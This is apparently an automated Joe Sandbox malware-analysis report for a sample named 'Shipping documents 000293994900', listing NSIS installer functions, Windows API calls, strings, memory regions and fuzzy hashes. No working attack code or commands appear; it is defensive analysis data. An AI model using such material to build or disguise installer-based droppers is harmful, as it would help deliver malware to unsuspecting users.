Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 004045C8 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,00427180), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

A, xrefs: 004046EB

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A
API String ID: 2246997448-3554254475
Opcode ID: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 00402DBA Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7A

Strings

Error launching installer, xrefs: 00402E0A
Null, xrefs: 00402EB3
soft, xrefs: 00402EAA
Inst, xrefs: 00402EA1
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 00405F0A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00406131

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 388DAA00 Relevance: 11.5, Strings: 9, Instructions: 229COMMON

Download Yara Rule

Strings

$]q, xrefs: 388DAB5D
$]q, xrefs: 388DAB88
ow5, xrefs: 388DAAE4
$]q, xrefs: 388DAB51
$]q, xrefs: 388DAAF6
$]q, xrefs: 388DAB02
$]q, xrefs: 388DABB2
$]q, xrefs: 388DAB7C
$]q, xrefs: 388DABBE

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$ow5
API String ID: 0-643804378
Opcode ID: a94a041ccb4c8cb3abe6ba851e117154c085927416926865b9a704b6a5400953
Instruction ID: 0b6ad0d2fa43d56469b874f9b0e9ddc4fc4f14763c2e1486b2c8691754578f27
Opcode Fuzzy Hash: a94a041ccb4c8cb3abe6ba851e117154c085927416926865b9a704b6a5400953
Instruction Fuzzy Hash: B2917F34A00209DFEB18DF68D994BAE7BB6FF44340F708529E801EB295DB749D4ACB50

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 00405192 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(?,00000064,?), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

verifying installer: %d%%, xrefs: 00402CC4
unpacking data: %d%%, xrefs: 00402CBD, 00402CCD

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 388D7160 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$]q, xrefs: 388D749C
.5uq, xrefs: 388D71BB
$]q, xrefs: 388D74A8
$]q, xrefs: 388D7442
$]q, xrefs: 388D7668
$]q, xrefs: 388D7674
$]q, xrefs: 388D75FC

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-981061697
Opcode ID: 05f6144dd89fa135ddecc204df5df5de80e04669b0366af716678e18a3bc697d
Instruction ID: fa21b80fb9f5bcf3e6b315ff43b4677db3ef40b68a881396f16d2f1ca939a3b9
Opcode Fuzzy Hash: 05f6144dd89fa135ddecc204df5df5de80e04669b0366af716678e18a3bc697d
Instruction Fuzzy Hash: ECF13034B00208CFDB19EFA5C954A5EBBB7BF88340F608529D815AB769DB34EC46CB44

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

x>A, xrefs: 004031F0

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: x>A
API String ID: 2146148272-3854404225
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 0040617C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 00406206

Strings

*?|<>/":, xrefs: 004061CE

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 004024EC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402566

Strings

8, xrefs: 0040250A

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8
API String ID: 1453599865-4194326291
Opcode ID: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
